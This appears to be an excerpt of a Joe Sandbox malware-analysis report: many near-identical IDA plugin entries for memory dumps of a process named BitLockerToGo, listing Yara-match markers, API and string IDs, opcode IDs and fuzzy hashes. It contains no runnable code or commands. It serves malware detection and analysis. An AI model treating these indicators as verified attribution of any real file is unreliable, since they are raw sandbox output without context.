                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: WU$_]
                                                                                                      • API String ID: 0-3594180508
                                                                                                      • Opcode ID: cb06f4b57f90729c2bf5772eb7fe226e4962468215683285ae23a482b7d6dcb2
                                                                                                      • Instruction ID: 93998a7d7603f296fd57b5e21fc0015982080d1103a009bb583bf017cd46e2cb
                                                                                                      • Opcode Fuzzy Hash: cb06f4b57f90729c2bf5772eb7fe226e4962468215683285ae23a482b7d6dcb2
                                                                                                      • Instruction Fuzzy Hash: 5121FF606183218AD3248F10D46233BB7B1FFE2784F18595DE5C21F7A1E3BE8941DB8A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: [I}
                                                                                                      • API String ID: 0-555681764
                                                                                                      • Opcode ID: d4a25b59ac2b540bd6829d790dc988c05c273a176d2d7efb4aad961cb765136f
                                                                                                      • Instruction ID: c6de33403e1966aa5bff50b5017fa87be2cc9db806a77bfbcb94e67fe7a3e563
                                                                                                      • Opcode Fuzzy Hash: d4a25b59ac2b540bd6829d790dc988c05c273a176d2d7efb4aad961cb765136f
                                                                                                      • Instruction Fuzzy Hash: A70210716083208BD314DF15E88176FB7E1FFC6318F448A2DE8955B381D7B89909CB9A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %1.17g
                                                                                                      • API String ID: 0-1551345525
                                                                                                      • Opcode ID: 8c3d54e96fd94494745a745ebc8e02827fdbeb2f2a216bcfa4fd7470785651ed
                                                                                                      • Instruction ID: c59dbd4c250e51ad8ba3bb8d55ea4afca9b2628edf7f50ecd096f44bbf1bf661
                                                                                                      • Opcode Fuzzy Hash: 8c3d54e96fd94494745a745ebc8e02827fdbeb2f2a216bcfa4fd7470785651ed
                                                                                                      • Instruction Fuzzy Hash: 4E12D571A08B418BD7158E548880327BBD2EFA1304F1D897ED859AB3D1E7B9DC45CF4A
                                                                                                      APIs
                                                                                                      • CoCreateInstance.OLE32(004499D8,00000000,00000001,004499C8), ref: 00425799
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateInstance
                                                                                                      • String ID:
                                                                                                      • API String ID: 542301482-0
                                                                                                      • Opcode ID: d1d64af515ebc48df76c804cc0fa90dac56acf758b55f15135cf7cc9d661b2cc
                                                                                                      • Instruction ID: 2de4e10ec9617faf465f20ffa0d319bf7bf7bcddca87ce4db74c0cf71200797e
                                                                                                      • Opcode Fuzzy Hash: d1d64af515ebc48df76c804cc0fa90dac56acf758b55f15135cf7cc9d661b2cc
                                                                                                      • Instruction Fuzzy Hash: AD51CFB17007209BDB20AB24DC86B7733A4EF85368F588519F985CB391F3B8D801C76A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: TA
                                                                                                      • API String ID: 2994545307-455071654
                                                                                                      • Opcode ID: a8e6bc2e0df5e8c49500ece1704ae4265b5cff83bbc844b633dccacb24c25272
                                                                                                      • Instruction ID: 4f7f8cdc52266ce63b824c68c8f641bab1979299edd93fe91afa4af3337c9a1f
                                                                                                      • Opcode Fuzzy Hash: a8e6bc2e0df5e8c49500ece1704ae4265b5cff83bbc844b633dccacb24c25272
                                                                                                      • Instruction Fuzzy Hash: F2E1E5756083418BE728CF21D9917ABB7A2FF95304F588D2ED88147352D3B8AC85C79A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: HGFE
                                                                                                      • API String ID: 0-2862901527
                                                                                                      • Opcode ID: 025289f68447900a304f362c9734bdb76dc335403cf02dd95e90a86083988b66
                                                                                                      • Instruction ID: 8ee950022cae915a18c7de1fd3d54a76134593a4993f5e00eedd909b6ac01ec7
                                                                                                      • Opcode Fuzzy Hash: 025289f68447900a304f362c9734bdb76dc335403cf02dd95e90a86083988b66
                                                                                                      • Instruction Fuzzy Hash: 01C14372B147208BC3149F25D882777B3E2EFC5354F99852EE8859B381E778DD01879A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "@B
                                                                                                      • API String ID: 0-2887984165
                                                                                                      • Opcode ID: 6d6c9c3ddcc466d9eeb19a862b7d5c3da6186527634c645c9c26f64ad252f559
                                                                                                      • Instruction ID: 5951c9fee924fb6d2147fcb850871edff086e4146aea6a539f68db0223537e1c
                                                                                                      • Opcode Fuzzy Hash: 6d6c9c3ddcc466d9eeb19a862b7d5c3da6186527634c645c9c26f64ad252f559
                                                                                                      • Instruction Fuzzy Hash: C9C100B06083208BD724DF15D89276BBBF2EFD2355F48891DE4818B3A4E77D8905CB96
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: B
                                                                                                      • API String ID: 0-1255198513
                                                                                                      • Opcode ID: 90558672f9fc43610c8432fdc8fe454ec5cdf9253a7e5cd96ada408802c24e29
                                                                                                      • Instruction ID: ffc335af6221a67aec596609ceb810eab3f2314bdd6ed345be04ff5badd0fb50
                                                                                                      • Opcode Fuzzy Hash: 90558672f9fc43610c8432fdc8fe454ec5cdf9253a7e5cd96ada408802c24e29
                                                                                                      • Instruction Fuzzy Hash: F1E12575A08390DFD3009F29A84172BBBE2BF86314F58897DF49487392D739D905CB5A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ~
                                                                                                      • API String ID: 0-1314861826
                                                                                                      • Opcode ID: 0c84eb5d5ebe00602620cdd8557bcc77e21a0366e0a6bc31a7d4dab63334fc84
                                                                                                      • Instruction ID: 3e3eb561e06a148c95b3d23fea8f7035ad405935131b963aa506cc0c007e8c7f
                                                                                                      • Opcode Fuzzy Hash: 0c84eb5d5ebe00602620cdd8557bcc77e21a0366e0a6bc31a7d4dab63334fc84
                                                                                                      • Instruction Fuzzy Hash: 81B1E2755483409BD7309F14CC827EBB7A1EF96314F048A2EE9C99B391E7789841CB9B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: bRD
                                                                                                      • API String ID: 0-1294892035
                                                                                                      • Opcode ID: 0a710fae5c1a036e02e7418541096c37c0acb78164add4835dcb148b85d26a61
                                                                                                      • Instruction ID: ff02802a109ca41e197f0b0674668eac4a4f9222675bf92ff47419530cb478fb
                                                                                                      • Opcode Fuzzy Hash: 0a710fae5c1a036e02e7418541096c37c0acb78164add4835dcb148b85d26a61
                                                                                                      • Instruction Fuzzy Hash: 3F81047AB49350CFD7148FA8E8E0766B7A2EB8E316F0E84BDC58587722D274D844C785
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-3019521637
                                                                                                      • Opcode ID: fccdb502cf9d0dd55d551d8a0f50c4df14d91cb32b71f026ad56220f6fb638b1
                                                                                                      • Instruction ID: 5cad1bb519f6a20fdafec16fa9e49a0307c62189ea80c1373280b85afc2cb06b
                                                                                                      • Opcode Fuzzy Hash: fccdb502cf9d0dd55d551d8a0f50c4df14d91cb32b71f026ad56220f6fb638b1
                                                                                                      • Instruction Fuzzy Hash: 8091F275A083118BD725CF28D880A2BB7F2FF8A710F1A852EE98197365D735EC51C786
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ,
                                                                                                      • API String ID: 0-3772416878
                                                                                                      • Opcode ID: 37f756bf959ae2e0a7e7d78eeac5330931023742c7c43367a445c5a24df0fd56
                                                                                                      • Instruction ID: 01f4adde1d8a591c5325ced968eda354948ed20be2320553e1c1b150e80474ec
                                                                                                      • Opcode Fuzzy Hash: 37f756bf959ae2e0a7e7d78eeac5330931023742c7c43367a445c5a24df0fd56
                                                                                                      • Instruction Fuzzy Hash: 92B138711083819FD325DF18C88061BFBE0AFA9704F448E2EE5D997782D635E918CB67
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-3019521637
                                                                                                      • Opcode ID: 1a6c61a64cd59658e570d2005ba41e2a15e811b29aea532cdee009a2420015f3
                                                                                                      • Instruction ID: 31addd0c15b42af517311c90aaa1a2fae0b1a43ec5c2c85150ccd7fdd60d87be
                                                                                                      • Opcode Fuzzy Hash: 1a6c61a64cd59658e570d2005ba41e2a15e811b29aea532cdee009a2420015f3
                                                                                                      • Instruction Fuzzy Hash: BB81E4352047029BE714DF18D490A2BB7E2FF86310F1A852EE8859B355EB74EC51CB87
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: InA>
                                                                                                      • API String ID: 2994545307-2903657838
                                                                                                      • Opcode ID: ba0f83a385815676c181a1b57296bfa8ced76ddb6c33d7f45ad60d1a3e5eadbf
                                                                                                      • Instruction ID: 2733a3e7ecfab1ee7609352c4dfc4de505aa4dfa689e277dbf158153ecdaf43b
                                                                                                      • Opcode Fuzzy Hash: ba0f83a385815676c181a1b57296bfa8ced76ddb6c33d7f45ad60d1a3e5eadbf
                                                                                                      • Instruction Fuzzy Hash: CF7116317083015FF704CF65C98076BB7A2BBC5354F18886EE985E73A1E6B8E8458756
                                                                                                      Strings
                                                                                                      • 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 00422B43
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
                                                                                                      • API String ID: 0-2471034898
                                                                                                      • Opcode ID: 67168023ee1ff5560d55a1ad4aebd87d57c8a2b37d4dcf132d89e9cbe55ab946
                                                                                                      • Instruction ID: 5fc3b0cd92393cb198973b55e447997536410292836bc491032810755ad9ef2a
                                                                                                      • Opcode Fuzzy Hash: 67168023ee1ff5560d55a1ad4aebd87d57c8a2b37d4dcf132d89e9cbe55ab946
                                                                                                      • Instruction Fuzzy Hash: 9C510737B1A9A05BC7204D3C2D112A6AF035BA33347BD436BD4B18B3D1C5AE9C079356
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: V;D
                                                                                                      • API String ID: 0-3665027489
                                                                                                      • Opcode ID: 7ac1564fe8e091d8da8b3e1c93bae93eb0f8b17e1f44ccc57822275fecc7c5b9
                                                                                                      • Instruction ID: 92cb82e75d119fd3d33fbff468c5fe5f74edc0aeca132e1334e17f2f4c61e6ae
                                                                                                      • Opcode Fuzzy Hash: 7ac1564fe8e091d8da8b3e1c93bae93eb0f8b17e1f44ccc57822275fecc7c5b9
                                                                                                      • Instruction Fuzzy Hash: 7271283560D3F24BC322CE29C4A051EBBE1AE96615B5983FED8F04F783C5259D06C766
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "
                                                                                                      • API String ID: 0-3984020932
                                                                                                      • Opcode ID: ecae04d559038cbaf8cf4adbbbb75382ead5f4f7f91068c00b99c446527e5719
                                                                                                      • Instruction ID: b732913931e6592bc6d34c833d2bfd7f3c0d0726e8f2b7cf655a5cd69e9444a0
                                                                                                      • Opcode Fuzzy Hash: ecae04d559038cbaf8cf4adbbbb75382ead5f4f7f91068c00b99c446527e5719
                                                                                                      • Instruction Fuzzy Hash: 03513472E002678FDB10CA68D4812BBFBA1FB55350F58826AC844AB381D33CEC46D7D5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "
                                                                                                      • API String ID: 0-3984020932
                                                                                                      • Opcode ID: 2c33b001021260ab249361e2108c8a42a73a895cef485b6beaaac408b8162028
                                                                                                      • Instruction ID: 2d4f56222f1e86b50be5a49111b79def99accf97ff9085caebcb3ad3bb644af2
                                                                                                      • Opcode Fuzzy Hash: 2c33b001021260ab249361e2108c8a42a73a895cef485b6beaaac408b8162028
                                                                                                      • Instruction Fuzzy Hash: 34514472F102668FDB20CA68D4412BBF7A2FB45300F59852ED8859B385E73CDC46E395
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 67c07c6aa2b5a6701d8050d4a515ce89995d9b9219aac0b1f1af7e485e0ac167
                                                                                                      • Instruction ID: 50500183b032ee6dc06cf10971eb802da517bc59a805a288650abec63f9be507
                                                                                                      • Opcode Fuzzy Hash: 67c07c6aa2b5a6701d8050d4a515ce89995d9b9219aac0b1f1af7e485e0ac167
                                                                                                      • Instruction Fuzzy Hash: F252B131908711CBC725AF1894902BBB3E1FFC5318F158B3ED996A72C1D739A855CB8A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: a2ac396e881e2b238bc65ca647faa8ce2b5fcc468dc51e4d0b3be7b738439c4f
                                                                                                      • Instruction ID: bedd85d0ccd2d5642b7c5f1eae805139faeb159070a0c42e620eab7bfc0472f5
                                                                                                      • Opcode Fuzzy Hash: a2ac396e881e2b238bc65ca647faa8ce2b5fcc468dc51e4d0b3be7b738439c4f
                                                                                                      • Instruction Fuzzy Hash: CB32F3B1708351ABD724CF11D981B6BB7E2EFC4314F58882EE9849B351D7B8E841CB5A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 051165325c3a9c01a4eff6cbfa396651d64ef6a5f3c0f789e3ef409b39bbfb0e
                                                                                                      • Instruction ID: 6f36adf13e7afad5e15ae1d371272c0c277fa59cddb190865315f7fe94f10427
                                                                                                      • Opcode Fuzzy Hash: 051165325c3a9c01a4eff6cbfa396651d64ef6a5f3c0f789e3ef409b39bbfb0e
                                                                                                      • Instruction Fuzzy Hash: 7652D73190C3458FC714CF28C0906AABBE1FF85314F198A7EE89A67391D779E945CB86
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 0bb5f9eb01fc56fc46ed467dc76d2f778c589d5495b5e35fdd06c0fd1469e9df
                                                                                                      • Instruction ID: 2079236a8f6f5d5c1427db2c4349fd280431b5af01facb3b398be7af612ed3c5
                                                                                                      • Opcode Fuzzy Hash: 0bb5f9eb01fc56fc46ed467dc76d2f778c589d5495b5e35fdd06c0fd1469e9df
                                                                                                      • Instruction Fuzzy Hash: 7252C370A087849FE7349B24C4847A7BBE1EB91314F18887EC5E616BC2D37DA885C78D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b290410587ff03d7ca952d55d44b05ce308e2df8daed46388ba8646f13a21f07
                                                                                                      • Instruction ID: f695b33d7d85013d9fd8c083f58a0ab1ae9535ffc5f62a3a5a665fcc0a81dd0d
                                                                                                      • Opcode Fuzzy Hash: b290410587ff03d7ca952d55d44b05ce308e2df8daed46388ba8646f13a21f07
                                                                                                      • Instruction Fuzzy Hash: F0121435A08355CFCB08CF28D89066AB7E2EF8D311F59897ED586973A2D634DD05CB84
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6fd9bfa7bc2be61301e2f1d8f6331ac805462f7ad5808e0ec3e29dce6e92438c
                                                                                                      • Instruction ID: c7b3c5648471ca208f29020d18aac7f5fc7a4f6f2e5e921f695708f2cf1556fc
                                                                                                      • Opcode Fuzzy Hash: 6fd9bfa7bc2be61301e2f1d8f6331ac805462f7ad5808e0ec3e29dce6e92438c
                                                                                                      • Instruction Fuzzy Hash: 0E424770A18B118FC338CF29C690566BBF2BF85310B644A2ED69797B90D739F845CB19
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4bfdbb28372194462e2f19915edbece9811e75a430515b94d08a987e8c690a11
                                                                                                      • Instruction ID: ecb8c7f2adf0dbd1e17e46fac6319425b24128ec041a58b11260f66c2ef01816
                                                                                                      • Opcode Fuzzy Hash: 4bfdbb28372194462e2f19915edbece9811e75a430515b94d08a987e8c690a11
                                                                                                      • Instruction Fuzzy Hash: F702F33AA14216CBCB18CF28E9612BFB7B2FF49302F0A847DC541973A4E7799951CB54
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 30a9915af957c528a61812ee8299480e6dfef751ec0918b04dfab1b27f8bd7f3
                                                                                                      • Instruction ID: d20dae43de497a67b19e2389d0e1db6301c3ba7134c2724b760a568d0c62ae51
                                                                                                      • Opcode Fuzzy Hash: 30a9915af957c528a61812ee8299480e6dfef751ec0918b04dfab1b27f8bd7f3
                                                                                                      • Instruction Fuzzy Hash: CEE17E752083418FC324DF29C980A2BFBE2AFD9300F48892DE4D997791D679E958CB57
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ab7cb451f10d0bff60bd4870ec285c38ced0ce44f006653559cfca119af2a1e8
                                                                                                      • Instruction ID: 389cadba8afd3b0f7f8d79ab750238984dc8b6ff668591e289f8bfffca49550e
                                                                                                      • Opcode Fuzzy Hash: ab7cb451f10d0bff60bd4870ec285c38ced0ce44f006653559cfca119af2a1e8
                                                                                                      • Instruction Fuzzy Hash: 5EF16979204601CFDB18CF29D8907AAB7B1FF49305F04893DD84687A92D779E9A5CF88
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 4ef9a3f350b3cc5b1fc5ac12fe90280bfdf9812ef852d42490b9d3225e9ee3d4
                                                                                                      • Instruction ID: 12884e6a7989165fb81e0b1c35817e4f94fa2a9ce1d19d2a4dba36cd159e470a
                                                                                                      • Opcode Fuzzy Hash: 4ef9a3f350b3cc5b1fc5ac12fe90280bfdf9812ef852d42490b9d3225e9ee3d4
                                                                                                      • Instruction Fuzzy Hash: 2BF1A576B587418FD728CF24C8517ABB7E2EB85314F18897EC19AC7381EB38A505CB45
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: c6c4ad43687b6b0c7872e6994a74e61dd2058b71f394b7b45885179891552b5b
                                                                                                      • Instruction ID: 91081cb8a8a803237d5b41b9695686510d057d629a1b5dfdeab40628d3a9f34a
                                                                                                      • Opcode Fuzzy Hash: c6c4ad43687b6b0c7872e6994a74e61dd2058b71f394b7b45885179891552b5b
                                                                                                      • Instruction Fuzzy Hash: 99C10F35609361CFC304CF28D89036BB7E1EF89315F49897ED886973A2D639DD098B86
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e5a73293e714700cace13ce396954a2fc8ee0e2b30e928b77e17afc096125b48
                                                                                                      • Instruction ID: be509b9372bb8da97857da53a7df0914ffa2128cc5e6b447f8473a608215b90a
                                                                                                      • Opcode Fuzzy Hash: e5a73293e714700cace13ce396954a2fc8ee0e2b30e928b77e17afc096125b48
                                                                                                      • Instruction Fuzzy Hash: F4C12731A08390CFD3208F39A85072A77E2BF96320F5987ADE5E15B2E1D7359D44CB86
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
